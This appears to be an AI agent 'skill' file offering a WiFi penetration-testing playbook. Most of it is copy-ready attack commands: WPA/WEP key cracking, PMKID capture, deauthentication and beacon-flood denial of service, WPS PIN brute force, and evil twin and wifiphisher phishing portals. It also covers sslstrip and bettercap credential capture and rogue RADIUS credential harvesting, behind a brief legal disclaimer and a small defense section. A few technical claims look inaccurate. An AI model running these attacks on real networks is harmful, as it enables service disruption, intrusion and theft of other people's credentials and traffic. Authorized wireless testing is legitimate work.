wireless-security-wifi-pentest

v2026.09.24

Wireless security penetration testing with aircrack-ng, WEP/WPA/WPA2/WPA3 attacks, and 802.11 exploitation

GitHub
安装命令
npx skhub add reason-machines/wireless-security-wifi-pentest
Markdown
SKILL.md

Wireless Security & WiFi Penetration Testing

Skill by ara.so — Security Skills collection.

Expert-level wireless security penetration testing using aircrack-ng suite, handshake capture, WEP/WPA/WPA2/WPA3 cracking, rogue AP deployment, and 802.11 exploitation techniques. This skill covers reconnaissance, attack execution, and defensive mitigation for wireless networks.

What This Skill Covers

  • 802.11 fundamentals: Frame types, encryption protocols (WEP, WPA, WPA2, WPA3), authentication mechanisms
  • Adapter configuration: Monitor mode setup, packet injection testing, chipset compatibility
  • Reconnaissance: Network discovery, hidden SSID enumeration, client enumeration, traffic analysis
  • WEP attacks: IVS capture, PTW attack, fragmentation, Chop-Chop, Caffe Latte
  • WPA/WPA2 attacks: Handshake capture, deauthentication, PMKID extraction, dictionary/GPU cracking
  • WPA3 exploitation: Downgrade attacks, Dragonblood vulnerabilities
  • Rogue AP attacks: Evil twin deployment, captive portals, wireless MITM
  • Enterprise WPA: EAP/RADIUS assessment, certificate validation bypass
  • Detection & defense: WIDS configuration, management frame protection, hardening recommendations

Prerequisites

Hardware Requirements

  • Injection-capable wireless adapter (Atheros AR9271 or Ralink RT3070/RT5372 chipset)
    • TP-Link TL-WN722N v1 (Atheros AR9271) ✅
    • Alfa AWUS036NHA (Atheros AR9271) ✅
    • Panda PAU05 (Ralink RT5372) ✅
    • Avoid: TL-WN722N v2/v3 (Realtek, no injection support)
  • Test access point you own and control
  • Client device for handshake generation
  • Kali Linux (bare-metal or VM with USB passthrough)

Software Stack

# Verify Kali includes core tools (pre-installed)
which aircrack-ng airodump-ng aireplay-ng airbase-ng

# Install additional tools
sudo apt update
sudo apt install -y \
  hashcat hcxdumptool hcxtools \
  reaver bully wash \
  hostapd dnsmasq \
  kismet wireshark-qt \
  bettercap wifiphisher

Adapter Setup & Monitor Mode

Identify Wireless Interface

# List wireless interfaces
iwconfig
ip link show

# Check interface details
iw dev

# Verify chipset (Atheros/Ralink preferred)
lsusb
lspci | grep -i wireless

Enable Monitor Mode

# Method 1: Using airmon-ng (recommended)
sudo airmon-ng check kill  # Kill interfering processes
sudo airmon-ng start wlan0  # Creates wlan0mon

# Method 2: Manual setup
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

# Verify monitor mode
iwconfig wlan0mon  # Should show "Mode:Monitor"

Test Packet Injection

# Critical test before attacks
sudo aireplay-ng --test wlan0mon

# Expected output:
# Injection is working!
# Found X APs
# Trying broadcast probe requests...
# Injection is working!

# Test against specific AP
sudo aireplay-ng --test -a 00:11:22:33:44:55 wlan0mon

Set Regulatory Domain & Channel

# Check current regulatory domain
iw reg get

# Set domain (affects power/channels)
sudo iw reg set US  # or GB, DE, etc.

# Set specific channel
sudo iw dev wlan0mon set channel 6

# Set frequency (alternative)
sudo iw dev wlan0mon set freq 2437  # Channel 6 = 2437 MHz

Reconnaissance & Network Discovery

Basic Network Scan

# Scan all channels, all encryption types
sudo airodump-ng wlan0mon

# Scan specific channel
sudo airodump-ng -c 6 wlan0mon

# Scan specific band
sudo airodump-ng --band a wlan0mon  # 5 GHz only
sudo airodump-ng --band bg wlan0mon  # 2.4 GHz only

# Save to file
sudo airodump-ng -w scan_output --output-format pcap,csv wlan0mon

Target Specific Network

# Focus on single BSSID
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w target wlan0mon

# Show only clients (stations)
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 --showack wlan0mon

Hidden SSID Discovery

# Passive: Wait for client probe/association
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 wlan0mon

# Active: Deauth client to force reassociation (reveals SSID)
sudo aireplay-ng --deauth 5 -a 00:11:22:33:44:55 wlan0mon

Client Enumeration with Kismet

# Start Kismet server
sudo kismet -c wlan0mon

# Web UI: http://localhost:2501
# First run: create admin user

# CLI query connected clients
kismet_client --list-clients --server localhost:2501

WPA/WPA2 Handshake Capture

Capture 4-Way Handshake

# Terminal 1: Start capture on target channel
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon

# Terminal 2: Deauth client to force reauthentication
sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
# -a = AP BSSID
# -c = Client MAC (optional, omit to deauth all clients)
# 10 = number of deauth packets

# Look for "WPA handshake: 00:11:22:33:44:55" in airodump-ng output

Verify Handshake Capture

# Check for valid handshake in capture file
sudo aircrack-ng capture-01.cap

# Output should show:
# 1 handshake

# Alternative verification with tshark
tshark -r capture-01.cap -Y "eapol" | grep -i handshake

Convert Handshake for Hashcat

# Extract handshake to hashcat format
sudo aircrack-ng -J output capture-01.cap
# Creates output.hccapx (hashcat 3.6+)

# Modern method with hcxpcapngtool (hashcat 6.0+)
hcxpcapngtool -o output.22000 capture-01.cap
# Creates output.22000 (WPA*01/02 hash format)

PMKID Attack (Clientless WPA/WPA2)

Capture PMKID

# Modern method with hcxdumptool (no deauth needed)
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

# Let run for 2-5 minutes, Ctrl+C to stop

# Convert to hashcat format
hcxpcapngtool -o pmkid.22000 pmkid.pcapng

# Verify PMKID present
grep -c "22000" pmkid.22000

WPA/WPA2 Cracking

Dictionary Attack with Aircrack-ng

# Crack using wordlist
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Specify BSSID if multiple networks in capture
sudo aircrack-ng -w wordlist.txt -b 00:11:22:33:44:55 capture-01.cap

# Show cracking progress
# KEY FOUND! [ password123 ]

GPU Cracking with Hashcat

# WPA/WPA2 handshake (mode 22000)
hashcat -m 22000 -a 0 output.22000 /usr/share/wordlists/rockyou.txt

# PMKID (mode 22000)
hashcat -m 22000 pmkid.22000 wordlist.txt

# With rules for mutations
hashcat -m 22000 -a 0 output.22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule

# Mask attack (brute-force patterns)
hashcat -m 22000 -a 3 output.22000 ?d?d?d?d?d?d?d?d
# ?d = digit, ?l = lowercase, ?u = uppercase, ?s = special

# Show cracked passwords
hashcat -m 22000 output.22000 --show

Precomputed Rainbow Tables (Cowpatty)

# Generate rainbow table for SSID
genpmk -f wordlist.txt -d pmk_database.db -s "TargetSSID"

# Crack using precomputed table (instant if password in table)
cowpatty -d pmk_database.db -r capture-01.cap -s "TargetSSID"

WEP Cracking

Passive IVS Collection (PTW Attack)

# Capture IVs on busy network
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w wep_capture wlan0mon

# Wait for 40,000+ IVs (Data column in airodump)
# Then crack:
sudo aircrack-ng wep_capture-01.cap

# KEY FOUND! [ XX:XX:XX:XX:XX ] (ASCII: "wepkey")

Active ARP Replay Attack

# Terminal 1: Capture
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w wep_arp wlan0mon

# Terminal 2: Fake authentication
sudo aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0mon

# Terminal 3: Wait for ARP packet, then replay
sudo aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0mon

# IVs accumulate rapidly (1000+/sec)
# Once 40K+ IVs collected, crack as above

Fragmentation Attack (No Clients)

# Fake auth
sudo aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0mon

# Obtain keystream with fragmentation
sudo aireplay-ng --fragment -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0mon

# Use keystream to forge ARP packet
sudo packetforge-ng --arp -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF -k 192.168.1.1 -l 192.168.1.2 -y fragment-*.xor -w arp_packet

# Inject forged packet
sudo aireplay-ng --interactive -r arp_packet wlan0mon

Deauthentication & DoS Attacks

Deauth Single Client

# Targeted deauth
sudo aireplay-ng --deauth 0 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
# 0 = infinite deauth packets (Ctrl+C to stop)

Deauth All Clients (Network DoS)

# Broadcast deauth (affects all clients)
sudo aireplay-ng --deauth 0 -a 00:11:22:33:44:55 wlan0mon

# With reason code
sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 --reason 7 wlan0mon

MDK4 Beacon Flood

# Flood with fake APs (WLAN DoS)
sudo mdk4 wlan0mon b -a -m

# Deauth flood
sudo mdk4 wlan0mon d -b /path/to/blacklist.txt

Evil Twin & Rogue AP Attacks

Basic Evil Twin with Hostapd

# Create hostapd config
cat > evil_twin.conf << EOF
interface=wlan0
driver=nl80211
ssid=TargetSSID
hw_mode=g
channel=6
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=12345678
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
EOF

# Start evil twin AP
sudo hostapd evil_twin.conf

# In another terminal, assign IP and run DHCP
sudo ip addr add 192.168.1.1/24 dev wlan0
sudo dnsmasq -C /dev/null -kd -F 192.168.1.10,192.168.1.100 -i wlan0 --bind-dynamic

Wifiphisher Automated Evil Twin

# Automatic evil twin + phishing portal
sudo wifiphisher -aI wlan0mon -eI eth0 -p firmware-upgrade

# Common phishing scenarios:
# -p firmware-upgrade
# -p oauth-login
# -p browser-plugin-update

Capture Credentials with Bettercap

# Start bettercap
sudo bettercap -iface wlan0

# In bettercap console:
> set wifi.interface wlan0mon
> wifi.recon on
> wifi.ap.ssid "TargetSSID"
> wifi.ap.bssid 00:11:22:33:44:55
> wifi.ap.channel 6
> set http.proxy.sslstrip true
> set net.sniff.verbose true
> http.proxy on
> net.sniff on

# Captures credentials, cookies, traffic

WPS Attacks

WPS PIN Brute Force with Reaver

# Check WPS enabled
sudo wash -i wlan0mon

# Reaver attack
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv

# With delay to avoid rate limiting
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv -d 5 -T 0.5 -N

# Pixie Dust attack (offline, fast)
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv -K

Bully WPS Attack

# Standard attack
sudo bully wlan0mon -b 00:11:22:33:44:55 -c 6

# Pixie Dust
sudo bully wlan0mon -b 00:11:22:33:44:55 -d -v 3

Enterprise WPA (EAP/RADIUS) Assessment

Enumerate EAP Methods

# Use eapmd5pass or EAPHammer
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
./eaphammer --certs --eap-spray

# Identify EAP type in captured traffic
tshark -r capture.pcap -Y "eap" -T fields -e eap.type | sort -u

Certificate Validation Bypass

# Rogue RADIUS with EAPHammer
sudo ./eaphammer \
  --interface wlan0 \
  --essid "EnterpriseSSID" \
  --creds \
  --auth wpa-eap

# Captures credentials when clients ignore cert warnings

WPA3 & Advanced Attacks

WPA3 Downgrade Attack

# Force WPA3 AP to WPA2 transition mode
sudo mdk4 wlan0mon d -a 00:11:22:33:44:55

# Or use hostapd-wpe with transition mode disabled

Dragonblood (CVE-2019-13377)

# Test for Dragonblood vulnerability
git clone https://github.com/vanhoefm/dragonslayer.git
cd dragonslayer
./dragonslayer.py --test wlan0mon --bssid 00:11:22:33:44:55

Traffic Analysis & MITM

Capture & Decrypt WPA Traffic

# Capture traffic
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w traffic wlan0mon

# After obtaining PSK, decrypt in Wireshark:
# Edit → Preferences → Protocols → IEEE 802.11
# Enable decryption, add key:
# wpa-pwd:password123:SSID

SSL Strip & Traffic Sniffing

# Route traffic through attacker (on rogue AP)
sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# SSL strip with sslstrip
sudo sslstrip -l 8080
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

# View captured credentials
tail -f /var/log/sslstrip.log

Detection & Defense

Management Frame Protection (802.11w)

# Enable in hostapd.conf
ieee80211w=2  # Required
# Protects against deauth/disassociation attacks

Wireless IDS with Kismet

# Configure alerts in kismet.conf
alert=DEAUTHFLOOD,5/min,Deauthentication DoS
alert=DISCONFLOOD,5/min,Disassociation DoS
alert=BSSTIMESTAMP,10/min,Evil Twin Detected

# Monitor for rogue APs
sudo kismet -c wlan0mon --daemonize

Common Workflows

Full WPA2 Crack Workflow

# 1. Monitor mode
sudo airmon-ng start wlan0

# 2. Scan for targets
sudo airodump-ng wlan0mon
# Note BSSID, channel, ESSID

# 3. Capture handshake
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon &
sleep 5
sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 wlan0mon

# 4. Verify handshake
sudo aircrack-ng capture-01.cap

# 5. Crack
hashcat -m 22000 -a 0 capture.22000 /usr/share/wordlists/rockyou.txt

# 6. Cleanup
sudo airmon-ng stop wlan0mon

Evil Twin Credential Harvest

# 1. Deauth clients from real AP
sudo aireplay-ng --deauth 0 -a 00:11:22:33:44:55 wlan0mon &

# 2. Start evil twin with same SSID
sudo wifiphisher -aI wlan0mon -eI eth0 -p oauth-login

# 3. Monitor for captured credentials
# Wifiphisher displays creds in real-time

# 4. Stop attack
# Ctrl+C, review logs in /root/.wifiphisher/

Troubleshooting

"Injection Failed" Errors

# 1. Kill interfering processes
sudo airmon-ng check kill

# 2. Reset adapter
sudo ip link set wlan0 down
sudo ip link set wlan0 up
sudo airmon-ng start wlan0

# 3. Verify injection again
sudo aireplay-ng --test wlan0mon

No Handshake Captured

# Ensure client is connected
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 wlan0mon
# Check STATION column for active clients

# Increase deauth count
sudo aireplay-ng --deauth 50 -a 00:11:22:33:44:55 wlan0mon

# Try PMKID attack instead (no clients needed)
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

Hashcat Not Using GPU

# Check GPU detected
hashcat -I

# Install NVIDIA drivers (if needed)
sudo apt install -y nvidia-driver nvidia-cuda-toolkit

# AMD ROCm for AMD GPUs
sudo apt install -y rocm-opencl-runtime

# Force GPU device
hashcat -m 22000 -D 2 hash.22000 wordlist.txt
# -D 1 = CPU, -D 2 = GPU

"Channel -1" Error

# Explicitly set channel before starting airodump
sudo iw dev wlan0mon set channel 6

# Or in airodump command
sudo airodump-ng -c 6 wlan0mon

Legal & Ethical Considerations

⚠️ WARNING: All techniques in this skill are for authorized testing only.

  • Test only networks you own or have explicit written permission to assess
  • Wireless attacks (deauth, jamming, rogue APs) are illegal under:
    • US: Computer Fraud & Abuse Act (CFAA), FCC regulations
    • EU: GDPR, national cybercrime laws
    • UK: Computer Misuse Act
  • Practice in isolated RF lab with controlled equipment
  • Use proper engagement documentation (scope, authorization, ROE)
  • Report vulnerabilities responsibly following coordinated disclosure

Additional Resources


Environment Variables Used:

  • None (all commands use direct system paths or user-provided wordlists)

Key Files:

  • /usr/share/wordlists/rockyou.txt - Default Kali wordlist
  • /usr/share/hashcat/rules/ - Hashcat rule sets
  • capture-01.cap - Airodump capture files (user-generated)
  • *.22000 - Hashcat WPA hash format (user-generated)
发现
标签

此技能尚未发布标签。

版本
最新版本元数据

版本

v2026.09.24

发布时间

2026年9月24日

分类

未分类

许可证

NOASSERTION

源路径

skills/wireless-security-wifi-pentest

默认分支

main

最新提交

304c245

Tree SHA

010f47d